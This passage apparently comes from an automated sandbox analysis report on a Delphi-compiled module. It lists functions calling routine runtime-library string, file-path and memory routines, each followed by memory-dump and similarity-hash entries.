                                                                                                    • Part of subcall function 5001C610: @System@@UStrCopy$qqrx20System@UnicodeStringii.RTL120(?,?,?,00000001,5001BE69,00000000,5001BEBF,?,?,00000000,00000000,00000000,00000000), ref: 5001C62F
                                                                                                  • @Sysutils@ExtractFileName$qqrx20System@UnicodeString.RTL120(00000000,5001CC45), ref: 5001CA8C
                                                                                                    • Part of subcall function 5001C8E4: @Sysutils@LastDelimiter$qqrx20System@UnicodeStringt1.RTL120(?,?,?,5001C5CC,00000000,5001C600,?,?,?,?,00000000,00000000), ref: 5001C8F2
                                                                                                    • Part of subcall function 5001C8E4: @System@@UStrCopy$qqrx20System@UnicodeStringii.RTL120(?,?,?,?,5001C5CC,00000000,5001C600,?,?,?,?,00000000,00000000), ref: 5001C904
                                                                                                  • @Sysutils@ExtractFileDrive$qqrx20System@UnicodeString.RTL120(00000000,5001CC45), ref: 5001CAA3
                                                                                                    • Part of subcall function 5001C70C: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001C8D4), ref: 5001C749
                                                                                                    • Part of subcall function 5001C70C: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001C8D4), ref: 5001C774
                                                                                                    • Part of subcall function 5001C70C: @System@@UStrCopy$qqrx20System@UnicodeStringii.RTL120(?,00000000,5001C8D4), ref: 5001C79A
                                                                                                  • @Sysutils@IncludeTrailingPathDelimiter$qqrx20System@UnicodeString.RTL120(00000000,5001CC45), ref: 5001CAB4
                                                                                                    • Part of subcall function 500286A0: @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,?,?,5001C5DA,?,00000000,5001C600,?,?,?,?,00000000,00000000), ref: 500286AB
                                                                                                    • Part of subcall function 500286A0: @Sysutils@IsPathDelimiter$qqrx20System@UnicodeStringi.RTL120(?,?,?,5001C5DA,?,00000000,5001C600,?,?,?,?,00000000,00000000), ref: 500286C5
                                                                                                    • Part of subcall function 500286A0: @System@@UStrCat$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,?,?,5001C5DA,?,00000000,5001C600,?,?,?,?,00000000,00000000), ref: 500286D5
                                                                                                  • @Sysutils@SameFileName$qqrx20System@UnicodeStringt1.RTL120(00000000,5001CC45), ref: 5001CAC2
                                                                                                    • Part of subcall function 5002889C: @Sysutils@AnsiLowerCase$qqrx20System@UnicodeString.RTL120(00000000,500288FA,?,?,?,00000000,00000000,?,5001CAC7,00000000,5001CC45), ref: 500288BC
                                                                                                    • Part of subcall function 5002889C: @Sysutils@AnsiLowerCase$qqrx20System@UnicodeString.RTL120(?,00000000,500288FA,?,?,?,00000000,00000000,?,5001CAC7,00000000,5001CC45), ref: 500288CA
                                                                                                    • Part of subcall function 5002889C: @Sysutils@CompareStr$qqrx20System@UnicodeStringt1.RTL120(00000000,500288FA,?,?,?,00000000,00000000,?,5001CAC7,00000000,5001CC45), ref: 500288D3
                                                                                                  • @Sysutils@ExcludeTrailingPathDelimiter$qqrx20System@UnicodeString.RTL120(00000000,5001CC45), ref: 5001CAFC
                                                                                                    • Part of subcall function 50028704: @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,?,00000001,5001BE14,00000000,5001BEBF,?,?,00000000,00000000,00000000,00000000), ref: 5002870F
                                                                                                    • Part of subcall function 50028704: @Sysutils@IsPathDelimiter$qqrx20System@UnicodeStringi.RTL120(?,?,00000001,5001BE14,00000000,5001BEBF,?,?,00000000,00000000,00000000,00000000), ref: 50028729
                                                                                                    • Part of subcall function 50028704: @System@@UStrSetLength$qqrr20System@UnicodeStringi.RTL120(?,?,00000001,5001BE14,00000000,5001BEBF,?,?,00000000,00000000,00000000,00000000), ref: 50028748
                                                                                                  • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,5001CC45), ref: 5001CB0A
                                                                                                  • @Sysutils@ExpandFileNameCase$qqrx20System@UnicodeStringr27Sysutils@TFilenameCaseMatch.RTL120(00000000,5001CC45), ref: 5001CB1E
                                                                                                    • Part of subcall function 5001CA14: @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,5001CC45), ref: 5001CB2C
                                                                                                    • Part of subcall function 5001CA14: @Sysutils@IncludeTrailingPathDelimiter$qqrx20System@UnicodeString.RTL120(00000000,5001CC45), ref: 5001CB49
                                                                                                    • Part of subcall function 5001CA14: @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,5001CC45), ref: 5001CB57
                                                                                                  • @Sysutils@FindClose$qqrr19Sysutils@TSearchRec.RTL120(00000000,5001CC45), ref: 5001CAEA
                                                                                                    • Part of subcall function 5001C140: FindClose.KERNEL32(?,?,5001C10A,00000000,?,?,?,?,5001CB91,00000000,5001CBDD,?,00000000,5001CC45), ref: 5001C14C
                                                                                                  • @Sysutils@FindFirst$qqrx20System@UnicodeStringir19Sysutils@TSearchRec.RTL120(00000000,5001CC45), ref: 5001CADD
                                                                                                    • Part of subcall function 5001C0CC: @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?,?,?,?,5001CB91,00000000,5001CBDD,?,00000000,5001CC45), ref: 5001C0E1
                                                                                                    • Part of subcall function 5001C0CC: FindFirstFileW.KERNEL32(00000000,?,?,?,?,5001CB91,00000000,5001CBDD,?,00000000,5001CC45), ref: 5001C0E7
                                                                                                    • Part of subcall function 5001C0CC: @Sysutils@FindClose$qqrr19Sysutils@TSearchRec.RTL120(00000000,?,?,?,?,5001CB91,00000000,5001CBDD,?,00000000,5001CC45), ref: 5001C105
                                                                                                  • @System@@UStrCat3$qqrr20System@UnicodeStringx20System@UnicodeStringt2.RTL120(00000000,5001CBDD,?,00000000,5001CC45), ref: 5001CB76
                                                                                                  • @Sysutils@FindFirst$qqrx20System@UnicodeStringir19Sysutils@TSearchRec.RTL120(00000000,5001CBDD,?,00000000,5001CC45), ref: 5001CB8C
                                                                                                  • @System@@UStrCat3$qqrr20System@UnicodeStringx20System@UnicodeStringt2.RTL120(00000000,5001CBDD,?,00000000,5001CC45), ref: 5001CBB8
                                                                                                  • @System@@TryFinallyExit$qqrv.RTL120(00000000,5001CBDD,?,00000000,5001CC45), ref: 5001CBBD
                                                                                                  • @Sysutils@FindClose$qqrr19Sysutils@TSearchRec.RTL120(5001CBE4,00000000,5001CC45), ref: 5001CBD7
                                                                                                  • @System@@FinalizeRecord$qqrpvt1.RTL120(5001CC4C), ref: 5001CC32
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@Unicode$Sysutils@$System@@$String$Stringx20$Delimiter$qqrx20FileFind$Path$Asg$qqrr20Search$AnsiStringt1$Case$qqrx20Close$qqrr19Copy$qqrx20ExtractFromName$qqrx20StringiStringiiTrailing$Cat3$qqrr20Char$qqrx20ExpandFirst$qqrx20IncludeInitializeInternalLastLowerNameRecord$qqrpvt1Str$qqrr20Stringir19Stringt2Stringx27System@%T$us$i0$%$Array$qqrpvt1uiCaseCat$qqrr20CharCloseCompareDrive$qqrx20ExcludeExit$qqrvFilenameFinalizeFinallyFirstFullLen$qqrr20Length$qqrr20MatchPath$qqrx20SameStr$qqrx20StringpbiStringr27
                                                                                                  • String ID:
                                                                                                  • API String ID: 3647251182-0
                                                                                                  • Opcode ID: babfc3170ad390a3f6173a305eb4a18e5706085a47ed011bab55c1456b62137d
                                                                                                  • Instruction ID: 8f116e2beaebb0910c79983e48f6089e9e1a1bde4e140d13074eedb8cff09ffc
                                                                                                  • Opcode Fuzzy Hash: babfc3170ad390a3f6173a305eb4a18e5706085a47ed011bab55c1456b62137d
                                                                                                  • Instruction Fuzzy Hash: B9510734906199DBDB50DFA4DD96ACDB7B5EF49310F9082E6E808A3211DB30AF85CF80
                                                                                                  APIs
                                                                                                  • @System@@FillChar$qqrpvib.RTL120 ref: 50003480
                                                                                                  • @System@@FillChar$qqrpvib.RTL120 ref: 50003492
                                                                                                  • @System@SysUnregisterExpectedMemoryLeak$qqrpv.RTL120 ref: 500034FA
                                                                                                  • @System@SysUnregisterExpectedMemoryLeak$qqrpv.RTL120 ref: 5000354C
                                                                                                  • @System@@PCharLen$qqrpc.RTL120 ref: 500035B3
                                                                                                  • @System@@PCharLen$qqrpc.RTL120 ref: 50003637
                                                                                                  • @System@@PCharLen$qqrpc.RTL120 ref: 50003694
                                                                                                  • @System@@PCharLen$qqrpc.RTL120 ref: 500036CD
                                                                                                  • @System@@PCharLen$qqrpc.RTL120 ref: 500036E9
                                                                                                  • @System@@PCharLen$qqrpc.RTL120 ref: 50003705
                                                                                                    • Part of subcall function 50003018: @System@Move$qqrpxvpvi.RTL120(?,?,500035CA), ref: 50003022
                                                                                                  • @System@@PCharLen$qqrpc.RTL120 ref: 5000379C
                                                                                                  • @System@@PCharLen$qqrpc.RTL120 ref: 50003802
                                                                                                  • MessageBoxA.USER32(00000000,?,50001ED0,00002010), ref: 50003829
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@@$CharLen$qqrpc$System@$Char$qqrpvibExpectedFillLeak$qqrpvMemoryUnregister$MessageMove$qqrpxvpvi
                                                                                                  • String ID: $7$<JP$jP
                                                                                                  • API String ID: 1068419464-4104698994
                                                                                                  • Opcode ID: a8bb0f9d858d0eae5a91e9caac678f446fdd161179c3f76a6e3532f1f0ec883b
                                                                                                  • Instruction ID: 1bd8d098dfdd9012cd56aed44c4f0c03c4dd7fa1f26bc2d498341ce450a84f99
                                                                                                  • Opcode Fuzzy Hash: a8bb0f9d858d0eae5a91e9caac678f446fdd161179c3f76a6e3532f1f0ec883b
                                                                                                  • Instruction Fuzzy Hash: 27B1E430A052D48BFB32DB6CDC90B88B7F8BB49650F9442E6E449DB352CB719D85CB91
                                                                                                  APIs
                                                                                                  • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,500392C3,?,?,?,?,00000000,00000000,00000000,?,5003078F,00000000,500307EF), ref: 500391E7
                                                                                                  • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,500392C3,?,?,?,?,00000000,00000000,00000000,?,5003078F,00000000,500307EF), ref: 500391FF
                                                                                                  • @System@@UStrCat3$qqrr20System@UnicodeStringx20System@UnicodeStringt2.RTL120(00000000,500392C3,?,?,?,?,00000000,00000000,00000000,?,5003078F,00000000,500307EF), ref: 50039290
                                                                                                  • @System@@UStrCat3$qqrr20System@UnicodeStringx20System@UnicodeStringt2.RTL120(00000000,500392C3,?,?,?,?,00000000,00000000,00000000,?,5003078F,00000000,500307EF), ref: 500392A3
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@Unicode$Stringx20System@@$Asg$qqrr20Cat3$qqrr20StringStringt2
                                                                                                  • String ID: Any$Array $ByRef $String$UnicodeString
                                                                                                  • API String ID: 2201327990-2617011621
                                                                                                  • Opcode ID: 2c48cb2b966e9eb535af4dc705276307beba80cf27b90786bbe315e30b6060d6
                                                                                                  • Instruction ID: ebc111c00f9f3ce4b2f0d66ad6076afb76b8f2783d8abbf171bc1124b3b59010
                                                                                                  • Opcode Fuzzy Hash: 2c48cb2b966e9eb535af4dc705276307beba80cf27b90786bbe315e30b6060d6
                                                                                                  • Instruction Fuzzy Hash: 4E21F7347055D0AFEF12EAD8D851BDAB3DAEF9A710FA04713BA0097386C6789E01C691
                                                                                                  APIs
                                                                                                  • @System@SysGetMem$qqri.RTL120 ref: 50002B40
                                                                                                  • @System@SysFreeMem$qqrpv.RTL120 ref: 50002B58
                                                                                                  • @System@SysGetMem$qqri.RTL120 ref: 50002B76
                                                                                                  • @System@SysFreeMem$qqrpv.RTL120 ref: 50002B9C
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@$FreeMem$qqriMem$qqrpv
                                                                                                  • String ID:
                                                                                                  • API String ID: 1065326172-0
                                                                                                  • Opcode ID: 07fe07600e9fc5acced1606dc5d0384102eb1ac5b07c89382bdbf1b765f8db2c
                                                                                                  • Instruction ID: 109219bf6a90ecac94eeb607d3392a2891908dbfbfbb0241e4c678e92fbbb21d
                                                                                                  • Opcode Fuzzy Hash: 07fe07600e9fc5acced1606dc5d0384102eb1ac5b07c89382bdbf1b765f8db2c
                                                                                                  • Instruction Fuzzy Hash: 48C10762700A814BF7159ABC9CA57ADB3D19BD4221F98833EE614CB396DAB4EC458381
                                                                                                  APIs
                                                                                                  • @Sysutils@ExtractFileDrive$qqrx20System@UnicodeString.RTL120(00000000,5001D2CD,?,?,?,?,00000004,00000000,00000000), ref: 5001D15E
                                                                                                  • @Sysutils@ExtractFileDrive$qqrx20System@UnicodeString.RTL120(?,00000000,5001D2CD,?,?,?,?,00000004,00000000,00000000), ref: 5001D16C
                                                                                                  • @Sysutils@SameFileName$qqrx20System@UnicodeStringt1.RTL120(00000000,5001D2CD,?,?,?,?,00000004,00000000,00000000), ref: 5001D175
                                                                                                  • @System@UniqueString$qqrr20System@UnicodeString.RTL120(00000000,5001D2CD,?,?,?,?,00000004,00000000,00000000), ref: 5001D18F
                                                                                                  • @System@UniqueString$qqrr20System@UnicodeString.RTL120(00000000,5001D2CD,?,?,?,?,00000004,00000000,00000000), ref: 5001D1A2
                                                                                                  • @System@@UStrFromPWChar$qqrr20System@UnicodeStringpb.RTL120(00000000,5001D2CD,?,?,?,?,00000004,00000000,00000000), ref: 5001D1EA
                                                                                                  • @System@@UStrFromPWChar$qqrr20System@UnicodeStringpb.RTL120(?,00000000,5001D2CD,?,?,?,?,00000004,00000000,00000000), ref: 5001D1F8
                                                                                                  • @Sysutils@SameFileName$qqrx20System@UnicodeStringt1.RTL120(00000000,5001D2CD,?,?,?,?,00000004,00000000,00000000), ref: 5001D201
                                                                                                  • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,5001D2CD,?,?,?,?,00000004,00000000,00000000), ref: 5001D20E
                                                                                                  • @System@@UStrCatN$qqrv.RTL120(5001D2FC,5001D2E8,00000004,00000000,5001D2CD,?,?,?,?,00000004,00000000,00000000), ref: 5001D22C
                                                                                                  • @System@@UStrFromPWChar$qqrr20System@UnicodeStringpb.RTL120(00000004,00000000,5001D2CD,?,?,?,?,00000004,00000000,00000000), ref: 5001D250
                                                                                                  • @System@@UStrCatN$qqrv.RTL120(5001D2FC,?,00000004,00000000,5001D2CD,?,?,?,?,00000004,00000000,00000000), ref: 5001D264
                                                                                                  • @System@@UStrFromPWChar$qqrr20System@UnicodeStringpb.RTL120(00000000,5001D2CD,?,?,?,?,00000004,00000000,00000000), ref: 5001D275
                                                                                                  • @System@@UStrCat$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,5001D2CD,?,?,?,?,00000004,00000000,00000000), ref: 5001D27F
                                                                                                    • Part of subcall function 5001D100: @Sysutils@AnsiStrScan$qqrpbb.RTL120(00000004,?,5001D1B5,00000000,5001D2CD,?,?,?,?,00000004,00000000,00000000), ref: 5001D110
                                                                                                  • @Sysutils@ExtractFileName$qqrx20System@UnicodeString.RTL120(00000000,5001D2CD,?,?,?,?,00000004,00000000,00000000), ref: 5001D28A
                                                                                                    • Part of subcall function 5001C8E4: @Sysutils@LastDelimiter$qqrx20System@UnicodeStringt1.RTL120(?,?,?,5001C5CC,00000000,5001C600,?,?,?,?,00000000,00000000), ref: 5001C8F2
                                                                                                    • Part of subcall function 5001C8E4: @System@@UStrCopy$qqrx20System@UnicodeStringii.RTL120(?,?,?,?,5001C5CC,00000000,5001C600,?,?,?,?,00000000,00000000), ref: 5001C904
                                                                                                  • @System@@UStrCat$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,5001D2CD,?,?,?,?,00000004,00000000,00000000), ref: 5001D294
                                                                                                    • Part of subcall function 5000A164: @System@@UStrSetLength$qqrr20System@UnicodeStringi.RTL120 ref: 5000A18D
                                                                                                    • Part of subcall function 5000A164: @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000), ref: 5000A1A4
                                                                                                    • Part of subcall function 5000A164: @System@Move$qqrpxvpvi.RTL120(00000000), ref: 5000A1B7
                                                                                                    • Part of subcall function 5000A164: @System@@LStrClr$qqrpv.RTL120(00000000), ref: 5000A1C4
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@$Unicode$System@@$String$Sysutils@$File$Char$qqrr20FromStringpbStringx20$ExtractName$qqrx20Stringt1$Asg$qqrr20Cat$qqrr20Drive$qqrx20N$qqrvSameString$qqrr20Unique$AnsiClr$qqrpvCopy$qqrx20Delimiter$qqrx20LastLength$qqrr20Move$qqrpxvpviScan$qqrpbbStringiStringii
                                                                                                  • String ID:
                                                                                                  • API String ID: 178390892-0
                                                                                                  • Opcode ID: 5cf03c4f51f339b5190f70d2a39a3b1a4e70701528fcd71156b8032a35829f8d
                                                                                                  • Instruction ID: 482c5ae77d457f58d2c42465c16c4b49129206617ce66a2e08880273dab9e065
                                                                                                  • Opcode Fuzzy Hash: 5cf03c4f51f339b5190f70d2a39a3b1a4e70701528fcd71156b8032a35829f8d
                                                                                                  • Instruction Fuzzy Hash: 26414234A01A99ABDB01DBD4EC91ADEB3B5EF68200F504637F510A3241DB74DE868B91
                                                                                                  APIs
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,500298F5), ref: 50029676
                                                                                                    • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,500298F5), ref: 5002969F
                                                                                                  • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,500298F5), ref: 500296B5
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,500298F5), ref: 500296DB
                                                                                                  • @Sysutils@CharLength$qqrx20System@UnicodeStringi.RTL120(00000000,500298F5), ref: 500296FA
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,500298F5), ref: 50029764
                                                                                                  • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,500298F5), ref: 50029777
                                                                                                  • @Sysutils@StrLComp$qqrpxbt1ui.RTL120(00000000,500298F5), ref: 50029786
                                                                                                  • @System@@UStrCopy$qqrx20System@UnicodeStringii.RTL120(?,00000000,500298F5), ref: 5002980F
                                                                                                  • @System@@UStrCat$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,00000000,500298F5), ref: 5002981A
                                                                                                  • @Sysutils@StrLComp$qqrpxbt1ui.RTL120(?,00000000,500298F5), ref: 50029864
                                                                                                  • @System@@UStrCat$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,00000000,500298F5), ref: 5002988A
                                                                                                  • @System@@UStrCopy$qqrx20System@UnicodeStringii.RTL120(?,00000000,500298F5), ref: 500298BA
                                                                                                  • @System@@UStrCat$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,00000000,500298F5), ref: 500298C5
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  APIs
                                                                                                  • @System@ParamCount$qqrv.RTL120(00000000,50029B78), ref: 50029994
                                                                                                    • Part of subcall function 500046CC: GetCommandLineW.KERNEL32(00000000,5000471D,?,?,?,00000000), ref: 500046E3
                                                                                                  • @System@ParamStr$qqri.RTL120(00000000,50029B78), ref: 500299AD
                                                                                                    • Part of subcall function 5000472C: @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120 ref: 5000473D
                                                                                                    • Part of subcall function 5000472C: GetModuleFileNameW.KERNEL32(00000000,?,00000105), ref: 50004752
                                                                                                    • Part of subcall function 5000472C: @System@@UStrFromPWCharLen$qqrr20System@UnicodeStringpbi.RTL120(00000000,?,00000105), ref: 5000475D
                                                                                                  • @System@@SetEq$qqrv.RTL120(00000000,50029B78), ref: 500299BB
                                                                                                  • @System@@UStrCopy$qqrx20System@UnicodeStringii.RTL120(?,00000000,50029B78), ref: 500299F5
                                                                                                  • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,00000000,50029B78), ref: 50029A00
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,00000000,50029B78), ref: 50029A1D
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,00000000,50029B78), ref: 50029A4E
                                                                                                  • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,?,00000000,50029B78), ref: 50029A6E
                                                                                                  • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,00000000,00000000,?,00000000,50029B78), ref: 50029A7B
                                                                                                  • CompareStringW.KERNEL32(00000400,00000001,00000000,00000000,00000000,00000000,?,00000000,50029B78), ref: 50029A88
                                                                                                  • @System@@UStrCopy$qqrx20System@UnicodeStringii.RTL120(?,00000000,50029B78), ref: 50029AB0
                                                                                                  • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,00000000,50029B78), ref: 50029ABB
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,00000000,50029B78), ref: 50029AD8
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,00000000,50029B78), ref: 50029B09
                                                                                                  • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,?,00000000,50029B78), ref: 50029B29
                                                                                                  • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,00000000,00000000,?,00000000,50029B78), ref: 50029B36
                                                                                                  • CompareStringW.KERNEL32(00000400,00000000,00000000,00000000,00000000,00000000,?,00000000,50029B78), ref: 50029B43
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  APIs
                                                                                                  • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,5001AA7C), ref: 5001A921
                                                                                                  • @Sysutils@AnsiStrScan$qqrpbb.RTL120(00000000,5001AA7C), ref: 5001A92A
                                                                                                  • @Sysutils@AnsiStrScan$qqrpbb.RTL120(00000000,5001AA7C), ref: 5001A93F
                                                                                                  • @System@@UStrFromWChar$qqrr20System@UnicodeStringb.RTL120(00000000,5001AA7C), ref: 5001A955
                                                                                                  • @System@@UStrFromWChar$qqrr20System@UnicodeStringb.RTL120(?,?,00000000,5001AA7C), ref: 5001A967
                                                                                                  • @System@@UStrCatN$qqrv.RTL120(?,?,?,00000000,5001AA7C), ref: 5001A976
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001AA7C), ref: 5001A998
                                                                                                  • @System@@UStrSetLength$qqrr20System@UnicodeStringi.RTL120(00000000,5001AA7C), ref: 5001A9AC
                                                                                                  • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,5001AA7C), ref: 5001A9B3
                                                                                                  • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,5001AA7C), ref: 5001A9C7
                                                                                                  • @Sysutils@AnsiStrScan$qqrpbb.RTL120(00000000,5001AA7C), ref: 5001A9D4
                                                                                                  • @System@Move$qqrpxvpvi.RTL120(00000000,5001AA7C), ref: 5001A9F1
                                                                                                  • @Sysutils@AnsiStrScan$qqrpbb.RTL120(00000000,5001AA7C), ref: 5001AA17
                                                                                                  • @Sysutils@StrEnd$qqrpxb.RTL120(00000000,5001AA7C), ref: 5001AA24
                                                                                                  • @System@Move$qqrpxvpvi.RTL120(00000000,5001AA7C), ref: 5001AA3E
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  APIs
                                                                                                  • @Sysutils@AnsiUpperCase$qqrx20System@UnicodeString.RTL120(00000000,500295F1), ref: 5002948C
                                                                                                    • Part of subcall function 50019EBC: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50019F40,?,?,?,?,?,500154E1,00000000,5001551A,?,?,?,00000000,00000000), ref: 50019EF5
                                                                                                    • Part of subcall function 50019EBC: @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,50019F40,?,?,?,?,?,500154E1,00000000,5001551A,?,?,?,00000000,00000000), ref: 50019F08
                                                                                                    • Part of subcall function 50019EBC: @System@@UStrFromPWCharLen$qqrr20System@UnicodeStringpbi.RTL120(00000000,50019F40,?,?,?,?,?,500154E1,00000000,5001551A,?,?,?,00000000,00000000), ref: 50019F13
                                                                                                    • Part of subcall function 50019EBC: @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?,00000000,50019F40,?,?,?,?,?,500154E1,00000000,5001551A,?,?,?,00000000,00000000), ref: 50019F1F
                                                                                                    • Part of subcall function 50019EBC: CharUpperBuffW.USER32(00000000,?,00000000,50019F40,?,?,?,?,?,500154E1,00000000,5001551A,?,?,?,00000000), ref: 50019F25
                                                                                                  • @Sysutils@AnsiUpperCase$qqrx20System@UnicodeString.RTL120(00000000,500295F1), ref: 50029497
                                                                                                  • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,500295F1), ref: 500294A3
                                                                                                  • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,500295F1), ref: 500294AE
                                                                                                  • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,500295F1), ref: 500294B8
                                                                                                  • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,500295F1), ref: 500294C2
                                                                                                  • @Sysutils@AnsiPos$qqrx20System@UnicodeStringt1.RTL120(00000000,500295F1), ref: 500294D2
                                                                                                    • Part of subcall function 50028754: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50028822), ref: 5002879B
                                                                                                    • Part of subcall function 50028754: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50028822), ref: 500287C3
                                                                                                    • Part of subcall function 50028754: @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?,00000000,50028822), ref: 500287D7
                                                                                                    • Part of subcall function 50028754: @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,?,00000000,50028822), ref: 500287E0
